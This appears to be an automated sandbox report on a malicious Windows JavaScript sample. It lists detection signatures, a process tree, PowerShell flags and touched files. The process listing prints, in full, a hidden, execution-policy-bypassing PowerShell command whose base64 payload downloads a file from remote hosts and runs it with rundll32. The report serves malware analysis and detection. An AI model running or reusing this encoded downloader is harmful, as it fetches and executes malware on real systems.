description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep |
parent_process | wscript.exe | martian_process | wscript "C:\Users\test22\AppData\Local\Temp\Lozrnlwd.js" Briguer RipenersCerebella BetaxedBeblooded | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\wscript.exe" "C:\Users\test22\AppData\Local\Temp\Lozrnlwd.js" Briguer RipenersCerebella BetaxedBeblooded | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JAB0AGgAZQBpAG4AZQAgAD0AIAA3ADEAMAA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADgAOwAkAEYAZQBhAHoAZQBkAEcAaQB0AG8AeABpAGcAZQBuAGkAbgAgAD0AIAAiAFMAeQBtAGIAbwBsAGkAcwBhAHQAaQBvAG4AUgBlAHMAdAByAGUAbgBnAHQAaABlAG4AZQBkACIAOwAkAG0AaQBjAHIAYQBtAG8AYwBrAFMAdQBwAGUAcgBpAG4AZABpAHYAaQBkAHUAYQBsAGkAcwB0ACAAPQAgACIAUgBlAHMAdQBsAHQAbABlAHMAcwBsAHkATwB0AHQAbwBtAGEAbgBlAGEAbgAiADsAJABjAGEAdABlAGcAbwByAGkAcwBpAG4AZwBNAG8AaABhAG0AbQBlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBNAFEAQQB1AEEARABJAEEATQB3AEEAMgBBAEMANABBAE0AZwBBAHkAQQBDADQAQQBPAEEAQQAzAEEAQwA4AEEAVgBnAEEAeQBBAEUATQBBAE4AdwBBAHYAQQBFAEkAQQBlAGcAQgB4AEEARQBVAEEATgBBAEEAeABBAEEAPQA9AFMAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBPAEEAQQB1AEEARABJAEEATgBRAEEAMQBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQBMAGcAQQB4AEEARABrAEEATQBnAEEAdgBBAEcAdwBBAGUAZwBCAFMAQQBDADgAQQBPAEEAQgBzAEEASABRAEEAUgBRAEEAeABBAEEAPQA9AFMAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBNAFEAQQB1AEEARABJAEEATQB3AEEAMgBBAEMANABBAE0AZwBBAHkAQQBDADQAQQBNAFEAQQB4AEEARABRAEEATAB3AEIAMQBBAEcAVQBBAGQAdwBCAG8AQQBFAGMAQQBMAHcAQgBSAEEARwBFAEEAVQBnAEIAUQBBAEcAMABBACIAOwBmAG8AcgBlAGEAYwBoACAAKAAkAHcAYQBtAGIAbABlAGQAIABpAG4AIAAkAGMAYQB0AGUAZwBvAHIAaQBzAGkAbgBnAE0AbwBoAGEAbQBtAGUAZAAgAC0AcwBwAGwAaQB0ACAAIgBTAGYAIgApACAAewAkAGEAZgB0AGUAcgB3AHIAaQBzAHQAQgB5AHAAbABhAGMAZQAgAD0AIAAzADMANQA7ACQAUwB1AGIAdgBpAHQAcgBlAG8AdQBzAGwAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAWQBBAEwAZwBBADMAQQBEAEUAQQBMAGcAQQB5AEEARABVAEEATQBnAEEAdQBBAEQARQBBAE8AQQBBAHcAQQBBAD0APQBCAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAUQBBAFkAUQBCADAAQQBHADgAQQBiAEEAQgBwAEEASABRAEEAYQBRAEIAagBBAEUAMABBAFkAUQBCAGoAQQBHAHMAQQBhAFEAQgB1AEEASABRAEEAYgB3AEIAegBBAEcAZwBBAFoAUQBCAHoAQQBDADQAQQBiAEEAQgBwAEEAQQA9AD0AQgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADUAQQBEAFEAQQBMAGcAQQB4AEEARABjAEEATwBBAEEAdQBBAEQARQBBAE8AUQBBAHoAQQBDADQAQQBNAFEAQQB5AEEARABZAEEAIgA7AHQAcgB5ACAAewAkAG0AbwBuAHQAcgBlAGEAbAAgAD0AIAAyADYANQA7ACQAZgByAGkAZwBoAHQAZQBuAGUAcgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAB3AGEAbQBiAGwAZQBkACkAKQA7AGkAdwByACAAJABmAHIAaQBnAGgAdABlAG4AZQByACAALQBPACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAcwBwAHIAYQB3AGwAaQBlAHMAdAAuAGQAZQBmAGUAbQBpAG4AaQB6AGUAOwAkAGcAcgBhAHAAZQB5AHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEUAQQBNAHcAQQB1AEEARABVAEEATQB3AEEAdQBBAEQASQBBAE0AUQBBAHgAQQBDADQAQQBOAGcAQQB3AEEAQQA9AD0AVgBTAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE4AZwBBAHUAQQBEAEkAQQBOAFEAQQB4AEEAQwA0AEEATQBRAEEAMABBAEQATQBBAEwAZwBBAHgAQQBEAE0AQQBNAEEAQQA9ACIAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAcwBwAHIAYQB3AGwAaQBlAHMAdAAuAGQAZQBmAGUAbQBpAG4AaQB6AGUAKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAxADYAMgAyADIAMQApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAFEAdwBBADYAQQBGAHcAQQBVAEEAQgB5AEEARwA4AEEAWgB3AEIAeQBBAEcARQBBAGIAUQBCAEUAQQBHAEUAQQBkAEEAQgBoAEEARgB3AEEAYwB3AEIAdwBBAEgASQBBAFkAUQBCADMAQQBHAHcAQQBhAFEAQgBsAEEASABNAEEAZABBAEEAdQBBAEcAUQBBAFoAUQBCAG0AQQBHAFUAQQBiAFEAQgBwAEEARwA0AEEAYQBRAEIANgBBAEcAVQBBAEwAQQBCAHcAQQBIAEkAQQBhAFEAQgB1AEEASABRAEEATwB3AEIAVwBBAEgAVQBBAFoAUQBCAEsAQQBGAE0AQQAiADsAJABQAG8AbAB5AHAAaQBkAG8AbQBBAGIAbwByAHQAaQB2AGUAbgBlAHMAcwAgAD0AIAAiAGMAZQBwAGgAYQBsAG8AdAByAGEAYwB0AG8AcgBJAHIAaQBzAHIAbwBvAHQAIgA7ACQAYgBhAHIAYgBlAHIAaQBuAGcARABlAGMAawBlAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHQAQQBHADgAQQBiAGcAQgBsAEEARwAwAEEAWgBRAEIATgBBAEcAVQBBAGIAQQBCAHYAQQBHAFEAQQBhAFEAQgB6AEEASABRAEEAYwB3AEEAdQBBAEcAMABBAGIAdwBCAHUAQQBHAFUAQQBlAFEAQQA9ACIAOwBiAHIAZQBhAGsAOwBWAHUAZQBKAFMAOwB9AFYAdQBlAEoAUwA7AH0AIABjAGEAdABjAGgAIAB7ACQAZQB4AHAAaQBhAHQAZQBzACAAPQAgADUAMwA1ADsAJABMAGUAdQBjAG8AYwB5AHQAbwBwAGUAbgBpAGMATwB3AGUAbgBpAGEAIAA9ACAAOQA2ADUAOwB9AH0AJABkAGkAcwBlAG4AZgByAGEAbgBjAGgAaQBzAGkAbgBnAFMAeQBtAGIAbwBsAGkAegBlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEQAQQBIAEkAQQBkAFEAQgBqAEEARwBrAEEAYwB3AEIATgBBAEgAVQBBAFoAQQBCAGkAQQBHAEUAQQBiAGcAQgByAEEAQwA0AEEAYgBBAEIAcABBAEcAMABBAGIAdwBBAD0AbABPAHMAZwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEUAQQBOAFEAQQB1AEEARABFAEEATgB3AEEAMQBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQBMAGcAQQB4AEEARABRAEEATQBnAEEAPQBsAE8AcwBnAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAQQBBAGMAZwBCAHYAQQBIAEEAQQBkAFEAQgBpAEEARwB3AEEAYQBRAEIAagBBAEcARQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQQB1AEEARwB3AEEAYgB3AEIAMgBBAEcAVQBBAGwATwBzAGcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABRAEEATgB3AEEAdQBBAEQARQBBAE0AQQBBADAAQQBDADQAQQBNAFEAQQB5AEEARABjAEEATABnAEEAeABBAEQASQBBAE0AQQBBAD0AIgA7AA==" | ||||||
parent_process | wscript.exe | martian_process | powershell -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JAB0AGgAZQBpAG4AZQAgAD0AIAA3ADEAMAA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADgAOwAkAEYAZQBhAHoAZQBkAEcAaQB0AG8AeABpAGcAZQBuAGkAbgAgAD0AIAAiAFMAeQBtAGIAbwBsAGkAcwBhAHQAaQBvAG4AUgBlAHMAdAByAGUAbgBnAHQAaABlAG4AZQBkACIAOwAkAG0AaQBjAHIAYQBtAG8AYwBrAFMAdQBwAGUAcgBpAG4AZABpAHYAaQBkAHUAYQBsAGkAcwB0ACAAPQAgACIAUgBlAHMAdQBsAHQAbABlAHMAcwBsAHkATwB0AHQAbwBtAGEAbgBlAGEAbgAiADsAJABjAGEAdABlAGcAbwByAGkAcwBpAG4AZwBNAG8AaABhAG0AbQBlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBNAFEAQQB1AEEARABJAEEATQB3AEEAMgBBAEMANABBAE0AZwBBAHkAQQBDADQAQQBPAEEAQQAzAEEAQwA4AEEAVgBnAEEAeQBBAEUATQBBAE4AdwBBAHYAQQBFAEkAQQBlAGcAQgB4AEEARQBVAEEATgBBAEEAeABBAEEAPQA9AFMAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBPAEEAQQB1AEEARABJAEEATgBRAEEAMQBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQBMAGcAQQB4AEEARABrAEEATQBnAEEAdgBBAEcAdwBBAGUAZwBCAFMAQQBDADgAQQBPAEEAQgBzAEEASABRAEEAUgBRAEEAeABBAEEAPQA9AFMAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBNAFEAQQB1AEEARABJAEEATQB3AEEAMgBBAEMANABBAE0AZwBBAHkAQQBDADQAQQBNAFEAQQB4AEEARABRAEEATAB3AEIAMQBBAEcAVQBBAGQAdwBCAG8AQQBFAGMAQQBMAHcAQgBSAEEARwBFAEEAVQBnAEIAUQBBAEcAMABBACIAOwBmAG8AcgBlAGEAYwBoACAAKAAkAHcAYQBtAGIAbABlAGQAIABpAG4AIAAkAGMAYQB0AGUAZwBvAHIAaQBzAGkAbgBnAE0AbwBoAGEAbQBtAGUAZAAgAC0AcwBwAGwAaQB0ACAAIgBTAGYAIgApACAAewAkAGEAZgB0AGUAcgB3AHIAaQBzAHQAQgB5AHAAbABhAGMAZQAgAD0AIAAzADMANQA7ACQAUwB1AGIAdgBpAHQAcgBlAG8AdQBzAGwAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAWQBBAEwAZwBBADMAQQBEAEUAQQBMAGcAQQB5AEEARABVAEEATQBnAEEAdQBBAEQARQBBAE8AQQBBAHcAQQBBAD0APQBCAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAUQBBAFkAUQBCADAAQQBHADgAQQBiAEEAQgBwAEEASABRAEEAYQBRAEIAagBBAEUAMABBAFkAUQBCAGoAQQBHAHMAQQBhAFEAQgB1AEEASABRAEEAYgB3AEIAegBBAEcAZwBBAFoAUQBCAHoAQQBDADQAQQBiAEEAQgBwAEEAQQA9AD0AQgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADUAQQBEAFEAQQBMAGcAQQB4AEEARABjAEEATwBBAEEAdQBBAEQARQBBAE8AUQBBAHoAQQBDADQAQQBNAFEAQQB5AEEARABZAEEAIgA7AHQAcgB5ACAAewAkAG0AbwBuAHQAcgBlAGEAbAAgAD0AIAAyADYANQA7ACQAZgByAGkAZwBoAHQAZQBuAGUAcgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAB3AGEAbQBiAGwAZQBkACkAKQA7AGkAdwByACAAJABmAHIAaQBnAGgAdABlAG4AZQByACAALQBPACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAcwBwAHIAYQB3AGwAaQBlAHMAdAAuAGQAZQBmAGUAbQBpAG4AaQB6AGUAOwAkAGcAcgBhAHAAZQB5AHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEUAQQBNAHcAQQB1AEEARABVAEEATQB3AEEAdQBBAEQASQBBAE0AUQBBAHgAQQBDADQAQQBOAGcAQQB3AEEAQQA9AD0AVgBTAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE4AZwBBAHUAQQBEAEkAQQBOAFEAQQB4AEEAQwA0AEEATQBRAEEAMABBAEQATQBBAEwAZwBBAHgAQQBEAE0AQQBNAEEAQQA9ACIAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAcwBwAHIAYQB3AGwAaQBlAHMAdAAuAGQAZQBmAGUAbQBpAG4AaQB6AGUAKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAxADYAMgAyADIAMQApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAFEAdwBBADYAQQBGAHcAQQBVAEEAQgB5AEEARwA4AEEAWgB3AEIAeQBBAEcARQBBAGIAUQBCAEUAQQBHAEUAQQBkAEEAQgBoAEEARgB3AEEAYwB3AEIAdwBBAEgASQBBAFkAUQBCADMAQQBHAHcAQQBhAFEAQgBsAEEASABNAEEAZABBAEEAdQBBAEcAUQBBAFoAUQBCAG0AQQBHAFUAQQBiAFEAQgBwAEEARwA0AEEAYQBRAEIANgBBAEcAVQBBAEwAQQBCAHcAQQBIAEkAQQBhAFEAQgB1AEEASABRAEEATwB3AEIAVwBBAEgAVQBBAFoAUQBCAEsAQQBGAE0AQQAiADsAJABQAG8AbAB5AHAAaQBkAG8AbQBBAGIAbwByAHQAaQB2AGUAbgBlAHMAcwAgAD0AIAAiAGMAZQBwAGgAYQBsAG8AdAByAGEAYwB0AG8AcgBJAHIAaQBzAHIAbwBvAHQAIgA7ACQAYgBhAHIAYgBlAHIAaQBuAGcARABlAGMAawBlAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHQAQQBHADgAQQBiAGcAQgBsAEEARwAwAEEAWgBRAEIATgBBAEcAVQBBAGIAQQBCAHYAQQBHAFEAQQBhAFEAQgB6AEEASABRAEEAYwB3AEEAdQBBAEcAMABBAGIAdwBCAHUAQQBHAFUAQQBlAFEAQQA9ACIAOwBiAHIAZQBhAGsAOwBWAHUAZQBKAFMAOwB9AFYAdQBlAEoAUwA7AH0AIABjAGEAdABjAGgAIAB7ACQAZQB4AHAAaQBhAHQAZQBzACAAPQAgADUAMwA1ADsAJABMAGUAdQBjAG8AYwB5AHQAbwBwAGUAbgBpAGMATwB3AGUAbgBpAGEAIAA9ACAAOQA2ADUAOwB9AH0AJABkAGkAcwBlAG4AZgByAGEAbgBjAGgAaQBzAGkAbgBnAFMAeQBtAGIAbwBsAGkAegBlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEQAQQBIAEkAQQBkAFEAQgBqAEEARwBrAEEAYwB3AEIATgBBAEgAVQBBAFoAQQBCAGkAQQBHAEUAQQBiAGcAQgByAEEAQwA0AEEAYgBBAEIAcABBAEcAMABBAGIAdwBBAD0AbABPAHMAZwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEUAQQBOAFEAQQB1AEEARABFAEEATgB3AEEAMQBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQBMAGcAQQB4AEEARABRAEEATQBnAEEAPQBsAE8AcwBnAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAQQBBAGMAZwBCAHYAQQBIAEEAQQBkAFEAQgBpAEEARwB3AEEAYQBRAEIAagBBAEcARQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQQB1AEEARwB3AEEAYgB3AEIAMgBBAEcAVQBBAGwATwBzAGcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABRAEEATgB3AEEAdQBBAEQARQBBAE0AQQBBADAAQQBDADQAQQBNAFEAQQB5AEEARABjAEEATABnAEEAeABBAEQASQBBAE0AQQBBAD0AIgA7AA==" |
option | -executionpolicy bypass | value | Attempts to bypass execution policy | ||||||
option | -noprofile | value | Does not load current user profile | ||||||
option | -nologo | value | Hides the copyright banner when PowerShell launches | ||||||
option | -windowstyle hidden | value | Attempts to execute command with a hidden window | ||||||
option | -executionpolicy bypass | value | Attempts to bypass execution policy | ||||||
option | -noprofile | value | Does not load current user profile | ||||||
option | -nologo | value | Hides the copyright banner when PowerShell launches | ||||||
option | -windowstyle hidden | value | Attempts to execute command with a hidden window |
file | C:\Windows\SysWOW64\wscript.exe |
file | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
file | C:\Windows\System32\ie4uinit.exe |
file | C:\Program Files\Windows Sidebar\sidebar.exe |
file | C:\Windows\System32\WindowsAnytimeUpgradeUI.exe |
file | C:\Windows\System32\xpsrchvw.exe |
file | C:\Windows\System32\displayswitch.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe |
file | C:\Windows\System32\mblctr.exe |
file | C:\Windows\System32\mstsc.exe |
file | C:\Windows\System32\SnippingTool.exe |
file | C:\Windows\System32\SoundRecorder.exe |
file | C:\Windows\System32\dfrgui.exe |
file | C:\Windows\System32\msinfo32.exe |
file | C:\Windows\System32\rstrui.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe |
file | C:\Program Files\Windows Journal\Journal.exe |
file | C:\Windows\System32\MdSched.exe |
file | C:\Windows\System32\msconfig.exe |
file | C:\Windows\System32\recdisc.exe |
file | C:\Windows\System32\msra.exe |